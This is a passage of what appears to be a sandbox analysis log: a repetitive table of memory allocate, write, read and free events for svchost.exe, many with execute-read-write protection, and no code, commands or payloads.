| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a348, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 7 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x20017, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a350, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 15 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x2001f, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a358, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 18 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x20022, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a360, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 8 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x20018, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a368, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 7 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x20017, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a370, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 5 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x20015, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a378, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 7 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x20017, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a380, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 7 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x20017, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a388, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 8 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x20018, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a390, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 19 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x20023, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a398, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 22 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x20026, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a3a0, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 15 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x2001f, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a3a8, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 11 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x2001b, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a3b0, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 5 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x20015, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a3b8, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 7 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x20017, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a3c0, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 6 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x20016, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a3c8, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 5 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x20015, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a3d0, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 8 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x20018, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a3d8, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 7 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x20017, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a3e0, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 6 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
